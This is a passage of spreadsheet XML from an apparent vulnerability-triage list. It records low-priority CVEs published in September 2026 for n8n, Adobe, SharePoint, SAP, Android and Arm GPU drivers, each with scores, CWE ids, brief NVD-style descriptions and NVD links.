s="5" t="n"><v>0.002</v></c><c r="I1519" s="5" t="inlineStr" /><c r="J1519" s="5" t="inlineStr" /><c r="K1519" s="5" t="inlineStr" /><c r="L1519" s="5" t="inlineStr" /><c r="M1519" s="5" t="inlineStr" /><c r="N1519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1519" s="5" t="inlineStr" /><c r="R1519" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="S1519" s="5" t="inlineStr"><is><t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t></is></c><c r="T1519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t></is></c></row><row r="1520"><c r="A1520" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1520" s="5" t="inlineStr"><is><t>CVE-2026-86994</t></is></c><c r="D1520" s="5" t="n"><v>4.3</v></c><c r="E1520" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1520" s="5" t="inlineStr" /><c r="H1520" s="5" t="n"><v>0.002</v></c><c r="I1520" s="5" t="inlineStr" /><c r="J1520" s="5" t="inlineStr" /><c r="K1520" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1520" s="5" t="inlineStr" /><c r="M1520" s="5" t="inlineStr" /><c r="N1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1520" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1520" s="5" t="inlineStr" /><c r="R1520" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1520" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the /rest/active-workflows endpoint returned every active workflow ID on the instance to any member regardless of sharing. Workflow activation, deactivation, and publication push events were also broadcast to clients that could not access the affected workflow, disclosing workflow IDs, version IDs, and activation error details. The affected paths include packages/cli/src/services/active-workflows.service.ts and packages/cli/src/workflows/workflow-push-notifier.service.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t></is></c></row><row r="1521"><c r="A1521" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1521" s="5" t="inlineStr"><is><t>CVE-2026-86995</t></is></c><c r="D1521" s="5" t="n"><v>4.3</v></c><c r="E1521" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1521" s="5" t="inlineStr" /><c r="H1521" s="5" t="n"><v>0.003</v></c><c r="I1521" s="5" t="inlineStr" /><c r="J1521" s="5" t="inlineStr" /><c r="K1521" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1521" s="5" t="inlineStr" /><c r="M1521" s="5" t="inlineStr" /><c r="N1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1521" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1521" s="5" t="inlineStr" /><c r="R1521" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S1521" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node validated the repository parameter for fetch or pull, but setUpstream wrote a branch..remote value into repository configuration without validating it. A later fetch or pull resolved the remote from that configuration instead of the checked parameter. An authenticated workflow editor could therefore point Git at any local repository readable by the n8n process and receive its contents through packages/nodes-base/nodes/Git/GenericFunctions.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t></is></c></row><row r="1522"><c r="A1522" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1522" s="5" t="inlineStr"><is><t>CVE-2026-12285</t></is></c><c r="D1522" s="5" t="n"><v>4</v></c><c r="E1522" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1522" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1522" s="5" t="inlineStr" /><c r="H1522" s="5" t="n"><v>0.001</v></c><c r="I1522" s="5" t="inlineStr" /><c r="J1522" s="5" t="inlineStr" /><c r="K1522" s="5" t="inlineStr" /><c r="L1522" s="5" t="inlineStr" /><c r="M1522" s="5" t="inlineStr" /><c r="N1522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1522" s="5" t="inlineStr" /><c r="R1522" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1522" s="5" t="inlineStr"><is><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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t></is></c></row><row r="1523"><c r="A1523" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1523" s="5" t="inlineStr"><is><t>CVE-2026-80159</t></is></c><c r="D1523" s="5" t="n"><v>4</v></c><c r="E1523" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1523" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1523" s="5" t="inlineStr" /><c r="H1523" s="5" t="n"><v>0.001</v></c><c r="I1523" s="5" t="inlineStr" /><c r="J1523" s="5" t="inlineStr" /><c r="K1523" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1523" s="5" t="inlineStr" /><c r="M1523" s="5" t="inlineStr" /><c r="N1523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1523" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1523" s="5" t="inlineStr" /><c r="R1523" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1523" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Untrusted Search Path vulnerability that could result in privilege escalation. An attacker with high privileges could leverage this vulnerability to gain elevated access. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t></is></c></row><row r="1524"><c r="A1524" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1524" s="5" t="inlineStr"><is><t>CVE-2026-49895</t></is></c><c r="D1524" s="5" t="n"><v>3.5</v></c><c r="E1524" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1524" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1524" s="5" t="inlineStr" /><c r="H1524" s="5" t="n"><v>0.001</v></c><c r="I1524" s="5" t="inlineStr" /><c r="J1524" s="5" t="inlineStr" /><c r="K1524" s="5" t="inlineStr" /><c r="L1524" s="5" t="inlineStr" /><c r="M1524" s="5" t="inlineStr" /><c r="N1524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1524" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1524" s="5" t="inlineStr" /><c r="R1524" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1524" s="5" t="inlineStr"><is><t>In get_eht_operation_channel_width of ieee802_11_common.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t></is></c></row><row r="1525"><c r="A1525" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1525" s="5" t="inlineStr"><is><t>CVE-2026-69904</t></is></c><c r="D1525" s="5" t="n"><v>3.5</v></c><c r="E1525" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1525" s="5" t="inlineStr" /><c r="H1525" s="5" t="n"><v>0.006</v></c><c r="I1525" s="5" t="inlineStr" /><c r="J1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1525" s="5" t="inlineStr" /><c r="M1525" s="5" t="inlineStr" /><c r="N1525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1525" s="5" t="inlineStr" /><c r="R1525" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1525" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t></is></c></row><row r="1526"><c r="A1526" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1526" s="5" t="inlineStr"><is><t>CVE-2026-75726</t></is></c><c r="D1526" s="5" t="n"><v>3.5</v></c><c r="E1526" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1526" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1526" s="5" t="inlineStr" /><c r="H1526" s="5" t="n"><v>0.004</v></c><c r="I1526" s="5" t="inlineStr" /><c r="J1526" s="5" t="inlineStr" /><c r="K1526" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1526" s="5" t="inlineStr" /><c r="M1526" s="5" t="inlineStr" /><c r="N1526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1526" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1526" s="5" t="inlineStr" /><c r="R1526" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1526" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized limited write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page.</t></is></c><c r="T1526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t></is></c></row><row r="1527"><c r="A1527" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1527" s="5" t="inlineStr"><is><t>CVE-2026-76960</t></is></c><c r="D1527" s="5" t="n"><v>3.5</v></c><c r="E1527" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1527" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1527" s="5" t="inlineStr" /><c r="H1527" s="5" t="n"><v>0.001</v></c><c r="I1527" s="5" t="inlineStr" /><c r="J1527" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1527" s="5" t="inlineStr" /><c r="L1527" s="5" t="inlineStr" /><c r="M1527" s="5" t="inlineStr" /><c r="N1527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1527" s="5" t="inlineStr" /><c r="R1527" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1527" s="5" t="inlineStr"><is><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is></c><c r="T1527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t></is></c></row><row r="1528"><c r="A1528" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1528" s="5" t="inlineStr"><is><t>CVE-2026-76961</t></is></c><c r="D1528" s="5" t="n"><v>3.5</v></c><c r="E1528" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1528" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1528" s="5" t="inlineStr" /><c r="H1528" s="5" t="n"><v>0.001</v></c><c r="I1528" s="5" t="inlineStr" /><c r="J1528" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1528" s="5" t="inlineStr" /><c r="L1528" s="5" t="inlineStr" /><c r="M1528" s="5" t="inlineStr" /><c r="N1528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1528" s="5" t="inlineStr" /><c r="R1528" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1528" s="5" t="inlineStr"><is><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is></c><c r="T1528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t></is></c></row><row r="1529"><c r="A1529" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1529" s="5" t="inlineStr"><is><t>CVE-2026-0054</t></is></c><c r="D1529" s="5" t="n"><v>3.3</v></c><c r="E1529" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1529" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1529" s="5" t="inlineStr" /><c r="H1529" s="5" t="n"><v>0.001</v></c><c r="I1529" s="5" t="inlineStr" /><c r="J1529" s="5" t="inlineStr" /><c r="K1529" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1529" s="5" t="inlineStr" /><c r="M1529" s="5" t="inlineStr" /><c r="N1529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1529" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1529" s="5" t="inlineStr" /><c r="R1529" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1529" s="5" t="inlineStr"><is><t>In isCallerAllowed of WalletContextualLocationsService.kt, there is a possible way to get wallet information due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t></is></c></row><row r="1530"><c r="A1530" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1530" s="5" t="inlineStr"><is><t>CVE-2026-28582</t></is></c><c r="D1530" s="5" t="n"><v>3.3</v></c><c r="E1530" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1530" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1530" s="5" t="inlineStr" /><c r="H1530" s="5" t="n"><v>0.001</v></c><c r="I1530" s="5" t="inlineStr" /><c r="J1530" s="5" t="inlineStr" /><c r="K1530" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1530" s="5" t="inlineStr" /><c r="M1530" s="5" t="inlineStr" /><c r="N1530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1530" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1530" s="5" t="inlineStr" /><c r="R1530" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1530" s="5" t="inlineStr"><is><t>In onCreate of ConfirmDeviceCredentialActivity.java, there is a possible unauthorized access to and modification of device credentials due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t></is></c></row><row r="1531"><c r="A1531" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1531" s="5" t="inlineStr"><is><t>CVE-2026-28622</t></is></c><c r="D1531" s="5" t="n"><v>3.3</v></c><c r="E1531" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1531" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1531" s="5" t="inlineStr" /><c r="H1531" s="5" t="n"><v>0.001</v></c><c r="I1531" s="5" t="inlineStr" /><c r="J1531" s="5" t="inlineStr" /><c r="K1531" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1531" s="5" t="inlineStr" /><c r="M1531" s="5" t="inlineStr" /><c r="N1531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1531" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1531" s="5" t="inlineStr" /><c r="R1531" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1531" s="5" t="inlineStr"><is><t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t></is></c></row><row r="1532"><c r="A1532" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1532" s="5" t="inlineStr"><is><t>CVE-2026-28623</t></is></c><c r="D1532" s="5" t="n"><v>3.3</v></c><c r="E1532" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1532" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1532" s="5" t="inlineStr" /><c r="H1532" s="5" t="n"><v>0.001</v></c><c r="I1532" s="5" t="inlineStr" /><c r="J1532" s="5" t="inlineStr" /><c r="K1532" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1532" s="5" t="inlineStr" /><c r="M1532" s="5" t="inlineStr" /><c r="N1532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1532" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1532" s="5" t="inlineStr" /><c r="R1532" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1532" s="5" t="inlineStr"><is><t>In writeToParcel of BleRssiRangingCapabilities.java, there is a possible way to obtain the Bluetooth MAC address due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t></is></c></row><row r="1533"><c r="A1533" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1533" s="5" t="inlineStr"><is><t>CVE-2026-28630</t></is></c><c r="D1533" s="5" t="n"><v>3.3</v></c><c r="E1533" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1533" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1533" s="5" t="inlineStr" /><c r="H1533" s="5" t="n"><v>0.001</v></c><c r="I1533" s="5" t="inlineStr" /><c r="J1533" s="5" t="inlineStr" /><c r="K1533" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1533" s="5" t="inlineStr" /><c r="M1533" s="5" t="inlineStr" /><c r="N1533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1533" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1533" s="5" t="inlineStr" /><c r="R1533" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1533" s="5" t="inlineStr"><is><t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t></is></c></row><row r="1534"><c r="A1534" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1534" s="5" t="inlineStr"><is><t>CVE-2026-28638</t></is></c><c r="D1534" s="5" t="n"><v>3.3</v></c><c r="E1534" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1534" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1534" s="5" t="inlineStr" /><c r="H1534" s="5" t="n"><v>0.001</v></c><c r="I1534" s="5" t="inlineStr" /><c r="J1534" s="5" t="inlineStr" /><c r="K1534" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1534" s="5" t="inlineStr" /><c r="M1534" s="5" t="inlineStr" /><c r="N1534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1534" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1534" s="5" t="inlineStr" /><c r="R1534" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1534" s="5" t="inlineStr"><is><t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t></is></c></row><row r="1535"><c r="A1535" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1535" s="5" t="inlineStr"><is><t>CVE-2026-28660</t></is></c><c r="D1535" s="5" t="n"><v>3.3</v></c><c r="E1535" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1535" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1535" s="5" t="inlineStr" /><c r="H1535" s="5" t="n"><v>0.001</v></c><c r="I1535" s="5" t="inlineStr" /><c r="J1535" s="5" t="inlineStr" /><c r="K1535" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1535" s="5" t="inlineStr" /><c r="M1535" s="5" t="inlineStr" /><c r="N1535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1535" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1535" s="5" t="inlineStr" /><c r="R1535" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1535" s="5" t="inlineStr"><is><t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t></is></c></row><row r="1536"><c r="A1536" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1536" s="5" t="inlineStr"><is><t>CVE-2026-28671</t></is></c><c r="D1536" s="5" t="n"><v>3.3</v></c><c r="E1536" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1536" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1536" s="5" t="inlineStr" /><c r="H1536" s="5" t="n"><v>0.001</v></c><c r="I1536" s="5" t="inlineStr" /><c r="J1536" s="5" t="inlineStr" /><c r="K1536" s="5" t="inlineStr" /><c r="L1536" s="5" t="inlineStr" /><c r="M1536" s="5" t="inlineStr" /><c r="N1536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1536" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1536" s="5" t="inlineStr" /><c r="R1536" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1536" s="5" t="inlineStr"><is><t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t></is></c></row><row r="1537"><c r="A1537" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1537" s="5" t="inlineStr"><is><t>CVE-2026-45519</t></is></c><c r="D1537" s="5" t="n"><v>3.3</v></c><c r="E1537" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1537" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1537" s="5" t="inlineStr" /><c r="H1537" s="5" t="n"><v>0.001</v></c><c r="I1537" s="5" t="inlineStr" /><c r="J1537" s="5" t="inlineStr" /><c r="K1537" s="5" t="inlineStr" /><c r="L1537" s="5" t="inlineStr" /><c r="M1537" s="5" t="inlineStr" /><c r="N1537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1537" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1537" s="5" t="inlineStr" /><c r="R1537" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1537" s="5" t="inlineStr"><is><t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t></is></c></row><row r="1538"><c r="A1538" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1538" s="5" t="inlineStr"><is><t>CVE-2026-45521</t></is></c><c r="D1538" s="5" t="n"><v>3.3</v></c><c r="E1538" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1538" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1538" s="5" t="inlineStr" /><c r="H1538" s="5" t="n"><v>0.001</v></c><c r="I1538" s="5" t="inlineStr" /><c r="J1538" s="5" t="inlineStr" /><c r="K1538" s="5" t="inlineStr" /><c r="L1538" s="5" t="inlineStr" /><c r="M1538" s="5" t="inlineStr" /><c r="N1538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1538" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1538" s="5" t="inlineStr" /><c r="R1538" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1538" s="5" t="inlineStr"><is><t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t></is></c></row><row r="1539"><c r="A1539" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1539" s="5" t="inlineStr"><is><t>CVE-2026-45525</t></is></c><c r="D1539" s="5" t="n"><v>3.3</v></c><c r="E1539" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1539" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1539" s="5" t="inlineStr" /><c r="H1539" s="5" t="n"><v>0.001</v></c><c r="I1539" s="5" t="inlineStr" /><c r="J1539" s="5" t="inlineStr" /><c 